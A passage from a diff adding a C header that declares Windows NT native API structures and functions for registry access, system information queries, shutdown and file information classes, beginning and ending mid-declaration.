+// Data[1]; // Variable size data not declared +} KEY_VALUE_FULL_INFORMATION, *PKEY_VALUE_FULL_INFORMATION; + + +typedef struct _KEY_VALUE_PARTIAL_INFORMATION { + ULONG TitleIndex; + ULONG Type; + ULONG DataLength; + UCHAR Data[1]; // Variable size +} KEY_VALUE_PARTIAL_INFORMATION, *PKEY_VALUE_PARTIAL_INFORMATION; + + + +NTSYSAPI +NTSTATUS +NTAPI +NtCreateKey( + OUT PHANDLE KeyHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes, + IN ULONG TitleIndex, + IN PUNICODE_STRING Class OPTIONAL, + IN ULONG CreateOptions, + OUT PULONG Disposition OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtOpenKey( + OUT PHANDLE KeyHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + +NTSYSAPI +NTSTATUS +NTAPI +NtQueryKey( + IN HANDLE KeyHandle, + IN KEY_INFORMATION_CLASS KeyInformationClass, + OUT PVOID KeyInformation, + IN ULONG Length, + OUT PULONG ResultLength + ); + +NTSYSAPI +NTSTATUS +NTAPI +NtEnumerateKey( + IN HANDLE KeyHandle, + IN ULONG Index, + IN KEY_INFORMATION_CLASS KeyInformationClass, + IN PVOID KeyInformation, + IN ULONG Length, + IN PULONG ResultLength + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtDeleteKey( + IN HANDLE KeyHandle + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtQueryValueKey( + IN HANDLE KeyHandle, + IN PUNICODE_STRING ValueName, + IN KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass, + OUT PVOID KeyValueInformation, + IN ULONG Length, + OUT PULONG ResultLength + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtSetValueKey( + IN HANDLE KeyHandle, + IN PUNICODE_STRING ValueName, + IN ULONG TitleIndex OPTIONAL, + IN ULONG Type, + IN PVOID Data, + IN ULONG DataSize + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtDeleteValueKey( + IN HANDLE KeyHandle, + IN PUNICODE_STRING ValueName + ); + +//----------------------------------------------------------------------------- +// RtlQueryRegistryValues + +// +// The following flags specify how the Name field of a RTL_QUERY_REGISTRY_TABLE +// entry is interpreted. A NULL name indicates the end of the table. +// + +#define RTL_QUERY_REGISTRY_SUBKEY 0x00000001 // Name is a subkey and remainder of + // table or until next subkey are value + // names for that subkey to look at. + +#define RTL_QUERY_REGISTRY_TOPKEY 0x00000002 // Reset current key to original key for + // this and all following table entries. + +#define RTL_QUERY_REGISTRY_REQUIRED 0x00000004 // Fail if no match found for this table + // entry. + +#define RTL_QUERY_REGISTRY_NOVALUE 0x00000008 // Used to mark a table entry that has no + // value name, just wants a call out, not + // an enumeration of all values. + +#define RTL_QUERY_REGISTRY_NOEXPAND 0x00000010 // Used to suppress the expansion of + // REG_MULTI_SZ into multiple callouts or + // to prevent the expansion of environment + // variable values in REG_EXPAND_SZ + +#define RTL_QUERY_REGISTRY_DIRECT 0x00000020 // QueryRoutine field ignored. EntryContext + // field points to location to store value. + // For null terminated strings, EntryContext + // points to UNICODE_STRING structure that + // that describes maximum size of buffer. + // If .Buffer field is NULL then a buffer is + // allocated. + // + +#define RTL_QUERY_REGISTRY_DELETE 0x00000040 // Used to delete value keys after they + // are queried. + + +// +// The following values for the RelativeTo parameter determine what the +// Path parameter to RtlQueryRegistryValues is relative to. +// + +#define RTL_REGISTRY_ABSOLUTE 0 // Path is a full path +#define RTL_REGISTRY_SERVICES 1 // \Registry\Machine\System\CurrentControlSet\Services +#define RTL_REGISTRY_CONTROL 2 // \Registry\Machine\System\CurrentControlSet\Control +#define RTL_REGISTRY_WINDOWS_NT 3 // \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion +#define RTL_REGISTRY_DEVICEMAP 4 // \Registry\Machine\Hardware\DeviceMap +#define RTL_REGISTRY_USER 5 // \Registry\User\CurrentUser +#define RTL_REGISTRY_MAXIMUM 6 +#define RTL_REGISTRY_HANDLE 0x40000000 // Low order bits are registry handle +#define RTL_REGISTRY_OPTIONAL 0x80000000 // Indicates the key node is optional + + +typedef NTSTATUS (NTAPI * PRTL_QUERY_REGISTRY_ROUTINE)( + IN PWSTR ValueName, + IN ULONG ValueType, + IN PVOID ValueData, + IN ULONG ValueLength, + IN PVOID Context, + IN PVOID EntryContext + ); + +typedef struct _RTL_QUERY_REGISTRY_TABLE +{ + PRTL_QUERY_REGISTRY_ROUTINE QueryRoutine; + ULONG Flags; + PWSTR Name; + PVOID EntryContext; + ULONG DefaultType; + PVOID DefaultData; + ULONG DefaultLength; + +} RTL_QUERY_REGISTRY_TABLE, *PRTL_QUERY_REGISTRY_TABLE; + + +NTSYSAPI +NTSTATUS +NTAPI +RtlQueryRegistryValues( + IN ULONG RelativeTo, + IN PCWSTR Path, + IN PRTL_QUERY_REGISTRY_TABLE QueryTable, + IN PVOID Context, + IN PVOID Environment OPTIONAL + ); + + +//----------------------------------------------------------------------------- +// Query system information + +typedef enum _SYSTEM_INFORMATION_CLASS +{ + SystemBasicInformation, // 0x00 SYSTEM_BASIC_INFORMATION + SystemProcessorInformation, // 0x01 SYSTEM_PROCESSOR_INFORMATION + SystemPerformanceInformation, // 0x02 + SystemTimeOfDayInformation, // 0x03 + SystemPathInformation, // 0x04 + SystemProcessInformation, // 0x05 + SystemCallCountInformation, // 0x06 + SystemDeviceInformation, // 0x07 + SystemProcessorPerformanceInformation, // 0x08 + SystemFlagsInformation, // 0x09 + SystemCallTimeInformation, // 0x0A + SystemModuleInformation, // 0x0B SYSTEM_MODULE_INFORMATION + SystemLocksInformation, // 0x0C + SystemStackTraceInformation, // 0x0D + SystemPagedPoolInformation, // 0x0E + SystemNonPagedPoolInformation, // 0x0F + SystemHandleInformation, // 0x10 + SystemObjectInformation, // 0x11 + SystemPageFileInformation, // 0x12 + SystemVdmInstemulInformation, // 0x13 + SystemVdmBopInformation, // 0x14 + SystemFileCacheInformation, // 0x15 + SystemPoolTagInformation, // 0x16 + SystemInterruptInformation, // 0x17 + SystemDpcBehaviorInformation, // 0x18 + SystemFullMemoryInformation, // 0x19 + SystemLoadGdiDriverInformation, // 0x1A + SystemUnloadGdiDriverInformation, // 0x1B + SystemTimeAdjustmentInformation, // 0x1C + SystemSummaryMemoryInformation, // 0x1D + SystemNextEventIdInformation, // 0x1E + SystemEventIdsInformation, // 0x1F + SystemCrashDumpInformation, // 0x20 + SystemExceptionInformation, // 0x21 + SystemCrashDumpStateInformation, // 0x22 + SystemKernelDebuggerInformation, // 0x23 + SystemContextSwitchInformation, // 0x24 + SystemRegistryQuotaInformation, // 0x25 + SystemExtendServiceTableInformation, // 0x26 + SystemPrioritySeperation, // 0x27 + SystemPlugPlayBusInformation, // 0x28 + SystemDockInformation, // 0x29 + //SystemPowerInformation, // 0x2A + //SystemProcessorSpeedInformation, // 0x2B + //SystemCurrentTimeZoneInformation, // 0x2C + //SystemLookasideInformation // 0x2D + +} SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS; + +// +// Thread priority +// + +typedef LONG KPRIORITY; + +// +// Basic System information +// NtQuerySystemInformation with SystemBasicInformation +// + +typedef struct _SYSTEM_BASIC_INFORMATION { + ULONG Reserved; + ULONG TimerResolution; + ULONG PageSize; + ULONG NumberOfPhysicalPages; + ULONG LowestPhysicalPageNumber; + ULONG HighestPhysicalPageNumber; + ULONG AllocationGranularity; + ULONG MinimumUserModeAddress; + ULONG MaximumUserModeAddress; + KAFFINITY ActiveProcessorsAffinityMask; + CCHAR NumberOfProcessors; +} SYSTEM_BASIC_INFORMATION, *PSYSTEM_BASIC_INFORMATION; + +// +// Processor information +// NtQuerySystemInformation with SystemProcessorInformation +// + +typedef struct _SYSTEM_PROCESSOR_INFORMATION { + USHORT ProcessorArchitecture; + USHORT ProcessorLevel; + USHORT ProcessorRevision; + USHORT Reserved; + ULONG ProcessorFeatureBits; +} SYSTEM_PROCESSOR_INFORMATION, *PSYSTEM_PROCESSOR_INFORMATION; + +// +// Performance information +// NtQuerySystemInformation with SystemPerformanceInformation +// + +typedef struct _SYSTEM_PERFORMANCE_INFORMATION { + LARGE_INTEGER IdleProcessTime; + LARGE_INTEGER IoReadTransferCount; + LARGE_INTEGER IoWriteTransferCount; + LARGE_INTEGER IoOtherTransferCount; + ULONG IoReadOperationCount; + ULONG IoWriteOperationCount; + ULONG IoOtherOperationCount; + ULONG AvailablePages; + ULONG CommittedPages; + ULONG CommitLimit; + ULONG PeakCommitment; + ULONG PageFaultCount; + ULONG CopyOnWriteCount; + ULONG TransitionCount; + ULONG CacheTransitionCount; + ULONG DemandZeroCount; + ULONG PageReadCount; + ULONG PageReadIoCount; + ULONG CacheReadCount; + ULONG CacheIoCount; + ULONG DirtyPagesWriteCount; + ULONG DirtyWriteIoCount; + ULONG MappedPagesWriteCount; + ULONG MappedWriteIoCount; + ULONG PagedPoolPages; + ULONG NonPagedPoolPages; + ULONG PagedPoolAllocs; + ULONG PagedPoolFrees; + ULONG NonPagedPoolAllocs; + ULONG NonPagedPoolFrees; + ULONG FreeSystemPtes; + ULONG ResidentSystemCodePage; + ULONG TotalSystemDriverPages; + ULONG TotalSystemCodePages; + ULONG NonPagedPoolLookasideHits; + ULONG PagedPoolLookasideHits; + ULONG Spare3Count; + ULONG ResidentSystemCachePage; + ULONG ResidentPagedPoolPage; + ULONG ResidentSystemDriverPage; + ULONG CcFastReadNoWait; + ULONG CcFastReadWait; + ULONG CcFastReadResourceMiss; + ULONG CcFastReadNotPossible; + ULONG CcFastMdlReadNoWait; + ULONG CcFastMdlReadWait; + ULONG CcFastMdlReadResourceMiss; + ULONG CcFastMdlReadNotPossible; + ULONG CcMapDataNoWait; + ULONG CcMapDataWait; + ULONG CcMapDataNoWaitMiss; + ULONG CcMapDataWaitMiss; + ULONG CcPinMappedDataCount; + ULONG CcPinReadNoWait; + ULONG CcPinReadWait; + ULONG CcPinReadNoWaitMiss; + ULONG CcPinReadWaitMiss; + ULONG CcCopyReadNoWait; + ULONG CcCopyReadWait; + ULONG CcCopyReadNoWaitMiss; + ULONG CcCopyReadWaitMiss; + ULONG CcMdlReadNoWait; + ULONG CcMdlReadWait; + ULONG CcMdlReadNoWaitMiss; + ULONG CcMdlReadWaitMiss; + ULONG CcReadAheadIos; + ULONG CcLazyWriteIos; + ULONG CcLazyWritePages; + ULONG CcDataFlushes; + ULONG CcDataPages; + ULONG ContextSwitches; + ULONG FirstLevelTbFills; + ULONG SecondLevelTbFills; + ULONG SystemCalls; +} SYSTEM_PERFORMANCE_INFORMATION, *PSYSTEM_PERFORMANCE_INFORMATION; + +// +// Time of Day information +// NtQuerySystemInformation with SystemTimeOfDayInformation +// + +typedef struct _SYSTEM_TIMEOFDAY_INFORMATION { + LARGE_INTEGER BootTime; + LARGE_INTEGER CurrentTime; + LARGE_INTEGER TimeZoneBias; + ULONG TimeZoneId; + ULONG Reserved; +} SYSTEM_TIMEOFDAY_INFORMATION, *PSYSTEM_TIMEOFDAY_INFORMATION; + +// +// Process information +// NtQuerySystemInformation with SystemProcessInformation +// + +typedef struct _SYSTEM_PROCESS_INFORMATION { + ULONG NextEntryOffset; + ULONG NumberOfThreads; + LARGE_INTEGER SpareLi1; + LARGE_INTEGER SpareLi2; + LARGE_INTEGER SpareLi3; + LARGE_INTEGER CreateTime; + LARGE_INTEGER UserTime; + LARGE_INTEGER KernelTime; + UNICODE_STRING ImageName; + KPRIORITY BasePriority; + ULONG_PTR UniqueProcessId; + ULONG_PTR InheritedFromUniqueProcessId; + ULONG HandleCount; + // Next part is platform dependent + +} SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION; + +// +// Device information +// NtQuerySystemInformation with SystemDeviceInformation +// + +typedef struct _SYSTEM_DEVICE_INFORMATION { + ULONG NumberOfDisks; + ULONG NumberOfFloppies; + ULONG NumberOfCdRoms; + ULONG NumberOfTapes; + ULONG NumberOfSerialPorts; + ULONG NumberOfParallelPorts; +} SYSTEM_DEVICE_INFORMATION, *PSYSTEM_DEVICE_INFORMATION; + +// +// Processor performance information +// NtQuerySystemInformation with SystemProcessorPerformanceInformation +// + +typedef struct _SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION { + LARGE_INTEGER IdleTime; + LARGE_INTEGER KernelTime; + LARGE_INTEGER UserTime; + LARGE_INTEGER DpcTime; // DEVL only + LARGE_INTEGER InterruptTime; // DEVL only + ULONG InterruptCount; +} SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION, *PSYSTEM_PROCESSOR_PERFORMANCE_INFORMATION; + +// +// NT Global Flag information +// NtQuerySystemInformation with SystemFlagsInformation +// + +typedef struct _SYSTEM_FLAGS_INFORMATION +{ + ULONG GlobalFlag; + +} SYSTEM_FLAGS_INFORMATION, *PSYSTEM_FLAGS_INFORMATION; + +// +// System Module information +// NtQuerySystemInformation with SystemModuleInformation +// + +typedef struct _SYSTEM_MODULE +{ + ULONG Reserved1; // Should be 0xBAADF00D + ULONG Reserved2; // Should be zero + PVOID Base; + ULONG Size; + ULONG Flags; + USHORT Index; + USHORT Unknown; + USHORT LoadCount; + USHORT ModuleNameOffset; + CHAR ImageName[256]; + +} SYSTEM_MODULE, *PSYSTEM_MODULE; + + +typedef struct _SYSTEM_MODULE_INFORMATION +{ + ULONG ModulesCount; + SYSTEM_MODULE Modules[1]; + +} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; + +/* +typedef struct _SYSTEM_VDM_INSTEMUL_INFO { + ULONG SegmentNotPresent ; + ULONG VdmOpcode0F ; + ULONG OpcodeESPrefix ; + ULONG OpcodeCSPrefix ; + ULONG OpcodeSSPrefix ; + ULONG OpcodeDSPrefix ; + ULONG OpcodeFSPrefix ; + ULONG OpcodeGSPrefix ; + ULONG OpcodeOPER32Prefix; + ULONG OpcodeADDR32Prefix; + ULONG OpcodeINSB ; + ULONG OpcodeINSW ; + ULONG OpcodeOUTSB ; + ULONG OpcodeOUTSW ; + ULONG OpcodePUSHF ; + ULONG OpcodePOPF ; + ULONG OpcodeINTnn ; + ULONG OpcodeINTO ; + ULONG OpcodeIRET ; + ULONG OpcodeINBimm ; + ULONG OpcodeINWimm ; + ULONG OpcodeOUTBimm ; + ULONG OpcodeOUTWimm ; + ULONG OpcodeINB ; + ULONG OpcodeINW ; + ULONG OpcodeOUTB ; + ULONG OpcodeOUTW ; + ULONG OpcodeLOCKPrefix ; + ULONG OpcodeREPNEPrefix ; + ULONG OpcodeREPPrefix ; + ULONG OpcodeHLT ; + ULONG OpcodeCLI ; + ULONG OpcodeSTI ; + ULONG BopCount ; +} SYSTEM_VDM_INSTEMUL_INFO, *PSYSTEM_VDM_INSTEMUL_INFO; + + +typedef struct _SYSTEM_QUERY_TIME_ADJUST_INFORMATION { + ULONG TimeAdjustment; + ULONG TimeIncrement; + BOOLEAN Enable; +} SYSTEM_QUERY_TIME_ADJUST_INFORMATION, *PSYSTEM_QUERY_TIME_ADJUST_INFORMATION; + +typedef struct _SYSTEM_SET_TIME_ADJUST_INFORMATION { + ULONG TimeAdjustment; + BOOLEAN Enable; +} SYSTEM_SET_TIME_ADJUST_INFORMATION, *PSYSTEM_SET_TIME_ADJUST_INFORMATION; + + +typedef struct _SYSTEM_THREAD_INFORMATION { + LARGE_INTEGER KernelTime; + LARGE_INTEGER UserTime; + LARGE_INTEGER CreateTime; + ULONG WaitTime; + PVOID StartAddress; + CLIENT_ID ClientId; + KPRIORITY Priority; + LONG BasePriority; + ULONG ContextSwitches; + ULONG ThreadState; + ULONG WaitReason; +} SYSTEM_THREAD_INFORMATION, *PSYSTEM_THREAD_INFORMATION; + +typedef struct _SYSTEM_MEMORY_INFO { + PUCHAR StringOffset; + USHORT ValidCount; + USHORT TransitionCount; + USHORT ModifiedCount; + USHORT PageTableCount; +} SYSTEM_MEMORY_INFO, *PSYSTEM_MEMORY_INFO; + +typedef struct _SYSTEM_MEMORY_INFORMATION { + ULONG InfoSize; + ULONG StringStart; + SYSTEM_MEMORY_INFO Memory[1]; +} SYSTEM_MEMORY_INFORMATION, *PSYSTEM_MEMORY_INFORMATION; + +typedef struct _SYSTEM_CALL_COUNT_INFORMATION { + ULONG Length; + ULONG NumberOfTables; + //ULONG NumberOfEntries[NumberOfTables]; + //ULONG CallCounts[NumberOfTables][NumberOfEntries]; +} SYSTEM_CALL_COUNT_INFORMATION, *PSYSTEM_CALL_COUNT_INFORMATION; + +typedef struct _SYSTEM_CRASH_DUMP_INFORMATION { + HANDLE CrashDumpSection; +} SYSTEM_CRASH_DUMP_INFORMATION, *PSYSTEM_CRASH_DUMP_INFORMATION; + +typedef struct _SYSTEM_EXCEPTION_INFORMATION { + ULONG AlignmentFixupCount; + ULONG ExceptionDispatchCount; + ULONG FloatingEmulationCount; + ULONG ByteWordEmulationCount; +} SYSTEM_EXCEPTION_INFORMATION, *PSYSTEM_EXCEPTION_INFORMATION; + +typedef struct _SYSTEM_CRASH_STATE_INFORMATION { + ULONG ValidCrashDump; +} SYSTEM_CRASH_STATE_INFORMATION, *PSYSTEM_CRASH_STATE_INFORMATION; + +typedef struct _SYSTEM_KERNEL_DEBUGGER_INFORMATION { + BOOLEAN KernelDebuggerEnabled; + BOOLEAN KernelDebuggerNotPresent; +} SYSTEM_KERNEL_DEBUGGER_INFORMATION, *PSYSTEM_KERNEL_DEBUGGER_INFORMATION; + +typedef struct _SYSTEM_REGISTRY_QUOTA_INFORMATION { + ULONG RegistryQuotaAllowed; + ULONG RegistryQuotaUsed; + ULONG PagedPoolSize; +} SYSTEM_REGISTRY_QUOTA_INFORMATION, *PSYSTEM_REGISTRY_QUOTA_INFORMATION; + +typedef struct _SYSTEM_GDI_DRIVER_INFORMATION { + UNICODE_STRING DriverName; + PVOID ImageAddress; + PVOID SectionPointer; + PVOID EntryPoint; + PIMAGE_EXPORT_DIRECTORY ExportSectionPointer; +} SYSTEM_GDI_DRIVER_INFORMATION, *PSYSTEM_GDI_DRIVER_INFORMATION; +*/ + +NTSYSAPI +NTSTATUS +NTAPI +NtQuerySystemInformation( + IN SYSTEM_INFORMATION_CLASS SystemInformationClass, + OUT PVOID SystemInformation, + IN ULONG SystemInformationLength, + OUT PULONG ReturnLength + ); + +//------------------------------------------------------------------------------ +// Shutdown system + +typedef enum _SHUTDOWN_ACTION +{ + ShutdownNoReboot, + ShutdownReboot, + ShutdownPowerOff + +} SHUTDOWN_ACTION, *PSHUTDOWN_ACTION; + + +NTSYSAPI +NTSTATUS +NTAPI +NtShutdownSystem( + IN SHUTDOWN_ACTION Action + ); + +//----------------------------------------------------------------------------- +// File functions + +#ifndef OLD_DOS_VOLID +#define OLD_DOS_VOLID 0x00000008 +#endif + +#ifndef FILE_SUPERSEDE +#define FILE_SUPERSEDE 0x00000000 +#define FILE_OPEN 0x00000001 +#define FILE_CREATE 0x00000002 +#define FILE_OPEN_IF 0x00000003 +#define FILE_OVERWRITE 0x00000004 +#define FILE_OVERWRITE_IF 0x00000005 +#define FILE_MAXIMUM_DISPOSITION 0x00000005 +#endif // File create flags + + +// Define the create/open option flags +#ifndef FILE_DIRECTORY_FILE +#define FILE_DIRECTORY_FILE 0x00000001 +#define FILE_WRITE_THROUGH 0x00000002 +#define FILE_SEQUENTIAL_ONLY 0x00000004 +#define FILE_NO_INTERMEDIATE_BUFFERING 0x00000008 +#define FILE_SYNCHRONOUS_IO_ALERT 0x00000010 +#define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020 +#define FILE_NON_DIRECTORY_FILE 0x00000040 +#define FILE_CREATE_TREE_CONNECTION 0x00000080 +#define FILE_COMPLETE_IF_OPLOCKED 0x00000100 +#define FILE_NO_EA_KNOWLEDGE 0x00000200 +#define FILE_OPEN_FOR_RECOVERY 0x00000400 +#define FILE_RANDOM_ACCESS 0x00000800 +#define FILE_DELETE_ON_CLOSE 0x00001000 +#define FILE_OPEN_BY_FILE_ID 0x00002000 +#define FILE_OPEN_FOR_BACKUP_INTENT 0x00004000 +#define FILE_NO_COMPRESSION 0x00008000 +#define FILE_RESERVE_OPFILTER 0x00100000 +#define FILE_OPEN_REPARSE_POINT 0x00200000 +#define FILE_OPEN_NO_RECALL 0x00400000 +#define FILE_OPEN_FOR_FREE_SPACE_QUERY 0x00800000 +#endif // FILE_DIRECTORY_FILE + + +// +// Define the I/O status information return values for NtCreateFile/NtOpenFile +// + +#ifndef FILE_SUPERSEDED +#define FILE_SUPERSEDED 0x00000000 +#define FILE_OPENED 0x00000001 +#define FILE_CREATED 0x00000002 +#define FILE_OVERWRITTEN 0x00000003 +#define FILE_EXISTS 0x00000004 +#define FILE_DOES_NOT_EXIST 0x00000005 +#endif + + +#ifndef PIO_APC_ROUTINE_DEFINED +typedef +VOID +(NTAPI *PIO_APC_ROUTINE) ( + IN PVOID ApcContext, + IN PIO_STATUS_BLOCK IoStatusBlock, + IN ULONG Reserved + ); +#define PIO_APC_ROUTINE_DEFINED +#endif // PIO_APC_ROUTINE_DEFINED + + +typedef enum _FILE_INFORMATION_CLASS +{ + FileDirectoryInformation = 1, + FileFullDirectoryInformation, // 2 + FileBothDirectoryInformation, // 3 + FileBasicInformation, // 4 wdm + FileStandardInformation, // 5 wdm + FileInternalInformation, // 6 + FileEaInformation, // 7 + FileAccessInformation, // 8 + FileNameInformation, // 9 + FileRenameInformation, // 10 + FileLinkInformation, // 11 + FileNamesInformation, // 12 + FileDispositionInformation, // 13 + FilePositionInformation, // 14 wdm + FileFullEaInformation, // 15 + FileModeInformation, // 16 + FileAlignmentInformation, // 17 + FileAllInformation, // 18 + FileAllocationInformation, // 19 + FileEndOfFileInformation, // 20 wdm + FileAlternateNameInformation, // 21 + FileStreamInformation, // 22 + FilePipeInformation, // 23 + FilePipeLocalInformation, // 24 + FilePipeRemoteInformation, // 25 + FileMailslotQueryInformation, // 26 + FileMailslotSetInformation, // 27 + FileCompressionInformation, // 28 + FileObjectIdInformation, // 29 + FileCompletionInformation, // 30 + FileMoveClusterInformation, // 31 + FileQuotaInformation, // 32 + FileReparsePointInformation, // 33 + FileNetworkOpenInformation, // 34 + FileAttributeTagInformation, // 35 + FileTrackingInformation, // 36 + FileIdBothDirectoryInformation, // 37 + FileIdFullDirectoryInformation, // 38 + FileValidDataLengthInformation, // 39 + FileShortNameInformation, // 40 + FileIoCompletionNotificationInformation, // 41 + FileIoStatusBlockRangeInformation, // 42 + FileIoPriorityHintInformation, // 43 + FileSfioReserveInformation, // 44 + FileSfioVolumeInformation, // 45 + FileHardLinkInformation, // 46 + FileProcessIdsUsingFileInformation, // 47 + FileMaximumInformation // 48 +} FILE_INFORMATION_CLASS, *PFILE_INFORMATION_CLASS; + + +typedef struct _FILE_DIRECTORY_INFORMATION { + ULONG NextEntryOffset; + ULONG FileIndex; + LARGE_INTEGER CreationTime; + LARGE_INTEGER LastAccessTime; + LARGE_INTEGER LastWriteTime; + LARGE_INTEGER ChangeTime; + LARGE_INTEGER EndOfFile; + LARGE_INTEGER AllocationSize; + ULONG FileAttributes; + ULONG FileNameLength; + WCHAR FileName[1]; +} FILE_DIRECTORY_INFORMATION, *PFILE_DIRECTORY_INFORMATION; + + +typedef struct _FILE_FULL_DIR_INFORMATION { + ULONG NextEntryOffset; + ULONG FileIndex; + LARGE_INTEGER CreationTime; + LARGE_INTEGER LastAccessTime; + LARGE_INTEGER LastWriteTime; + LARGE_INTEGER ChangeTime; + LARGE_INTEGER EndOfFile; + LARGE_INTEGER AllocationSize; + ULONG FileAttributes; + ULONG FileNameLength; + ULONG EaSize; + WCHAR FileName[1]; +} FILE_FULL_DIR_INFORMATION, *PFILE_FULL_DIR_INFORMATION; + + +typedef struct _FILE_BOTH_DIR_INFORMATION { + ULONG NextEntryOffset; + ULONG FileIndex; + LARGE_INTEGER CreationTime; + LARGE_INTEGER LastAccessTime; + LARGE_INTEGER LastWriteTime; + LARGE_INTEGER ChangeTime; + LARGE_INTEGER EndOfFile; + LARGE_INTEGER AllocationSize; + ULONG FileAttributes; + ULONG FileNameLength; + ULONG EaSize; + CCHAR ShortNameLength; + WCHAR ShortName[12]; + WCHAR FileName[1]; +} FILE_BOTH_DIR_INFORMATION, *PFILE_BOTH_DIR_INFORMATION; + + +typedef struct _FILE_BASIC_INFORMATION { + LARGE_INTEGER CreationTime; + LARGE_INTEGER LastAccessTime; + LARGE_INTEGER LastWriteTime; + LARGE_INTEGER ChangeTime; + ULONG FileAttributes; +} FILE_BASIC_INFORMATION, *PFILE_BASIC_INFORMATION; + + +typedef struct _FILE_STANDARD_INFORMATION { + LARGE_INTEGER AllocationSize; + LARGE_INTEGER EndOfFile; + ULONG NumberOfLinks; + BOOLEAN DeletePending; + BOOLEAN Directory; +} FILE_STANDARD_INFORMATION, *PFILE_STANDARD_INFORMATION; + + +typedef struct _FILE_INTERNAL_INFORMATION { + LARGE_INTEGER IndexNumber; +} FILE_INTERNAL_INFORMATION, *PFILE_INTERNAL_INFORMATION; + + +typedef struct _FILE_EA_INFORMATION { + ULONG EaSize; +} FILE_EA_INFORMATION, *PFILE_EA_INFORMATION; + + +typedef struct _FILE_ACCESS_INFORMATION { + ACCESS_MASK AccessFlags; +} FILE_ACCESS_INFORMATION, *PFILE_ACCESS_INFORMATION; + + +typedef struct _FILE_NAME_INFORMATION { + ULONG FileNameLength; + WCHAR FileName[1]; +} FILE_NAME_INFORMATION, *PFILE_NAME_INFORMATION; + + +typedef struct _FILE_RENAME_INFORMATION { + BOOLEAN ReplaceIfExists; + HANDLE RootDirectory; + ULONG FileNameLength; + WCHAR FileName[1]; +} FILE_RENAME_INFORMATION, *PFILE_RENAME_INFORMATION; + + +typedef struct _FILE_NAMES_INFORMATION { + ULONG NextEntryOffset; + ULONG FileIndex; + ULONG FileNameLength; + WCHAR FileName[1]; +} FILE_NAMES_INFORMATION, *PFILE_NAMES_INFORMATION; + + +typedef struct _FILE_DISPOSITION_INFORMATION { + BOOLEAN DeleteFile; +} FILE_DISPOSITION_INFORMATION, *PFILE_DISPOSITION_INFORMATION; + + +typedef struct _FILE_POSITION_INFORMATION { + LARGE_INTEGER CurrentByteOffset; +} FILE_POSITION_INFORMATION, *PFILE_POSITION_INFORMATION; + + +typedef struct _FILE_FULL_EA_INFORMATION { + ULONG NextEntryOffset; + UCHAR Flags; + UCHAR EaNameLength; + USHORT EaValueLength; + CHAR EaName[1]; +} FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION; + + +typedef struct _FILE_MODE_INFORMATION { + ULONG Mode; +} FILE_MODE_INFORMATION, *PFILE_MODE_INFORMATION; + + +typedef struct _FILE_ALIGNMENT_INFORMATION { + ULONG AlignmentRequirement; +} FILE_ALIGNMENT_INFORMATION, *PFILE_ALIGNMENT_INFORMATION; + + +typedef struct _FILE_ALL_INFORMATION { + FILE_BASIC_INFORMATION BasicInformation; + FILE_STANDARD_INFORMATION StandardInformation; + FILE_INTERNAL_INFORMATION InternalInformation; + FILE_EA_INFORMATION EaInformation; + FILE_ACCESS_INFORMATION AccessInformation; + FILE_POSITION_INFORMATION PositionInformation; + FILE_MODE_INFORMATION ModeInformation; + FILE_ALIGNMENT_INFORMATION AlignmentInformation; + FILE_NAME_INFORMATION NameInformation; +} FILE_ALL_INFORMATION, *PFILE_ALL_INFORMATION; + + +typedef struct _FILE_ALLOCATION_INFORMATION { + LARGE_INTEGER AllocationSize; +} FILE_ALLOCATION_INFORMATION, *PFILE_ALLOCATION_INFORMATION; + + +typedef struct _FILE_END_OF_FILE_INFORMATION { + LARGE_INTEGER EndOfFile; +} FILE_END_OF_FILE_INFORMATION, *PFILE_END_OF_FILE_INFORMATION; + + +typedef struct _FILE_STREAM_INFORMATION { + ULONG NextEntryOffset; + ULONG StreamNameLength; + LARGE_INTEGER StreamSize; + LARGE_INTEGER StreamAllocationSize; + WCHAR StreamName[1]; +} FILE_STREAM_INFORMATION, *PFILE_STREAM_INFORMATION; + +typedef struct _FILE_PIPE_INFORMATION { + ULONG ReadMode; + ULONG CompletionMode; +} FILE_PIPE_INFORMATION, *PFILE_PIPE_INFORMATION; + + +typedef struct _FILE_PIPE_LOCAL_INFORMATION { + ULONG NamedPipeType; + ULONG NamedPipeConfiguration; + ULONG MaximumInstances; + ULONG CurrentInstances; + ULONG InboundQuota; + ULONG ReadDataAvailable; + ULONG OutboundQuota; + ULONG WriteQuotaAvailable; + ULONG NamedPipeState; + ULONG NamedPipeEnd; +} FILE_PIPE_LOCAL_INFORMATION, *PFILE_PIPE_LOCAL_INFORMATION; + + +typedef struct _FILE_PIPE_REMOTE_INFORMATION { + LARGE_INTEGER CollectDataTime; + ULONG MaximumCollectionCount; +} FILE_PIPE_REMOTE_INFORMATION, *PFILE_PIPE_REMOTE_INFORMATION; + + +typedef struct _FILE_MAILSLOT_QUERY_INFORMATION { + ULONG MaximumMessageSize; + ULONG MailslotQuota; + ULONG NextMessageSize; + ULONG MessagesAvailable; + LARGE_INTEGER ReadTimeout; +} FILE_MAILSLOT_QUERY_INFORMATION, *PFILE_MAILSLOT_QUERY_INFORMATION; + + +typedef struct _FILE_MAILSLOT_SET_INFORMATION { + PLARGE_INTEGER ReadTimeout; +} FILE_MAILSLOT_SET_INFORMATION, *PFILE_MAILSLOT_SET_INFORMATION; + + +typedef struct _FILE_COMPRESSION_INFORMATION { + LARGE_INTEGER CompressedFileSize; + USHORT CompressionFormat; + UCHAR CompressionUnitShift; + UCHAR ChunkShift; + UCHAR ClusterShift; + UCHAR Reserved[3]; +} FILE_COMPRESSION_INFORMATION, *PFILE_COMPRESSION_INFORMATION; + + +typedef struct _FILE_LINK_INFORMATION { + BOOLEAN 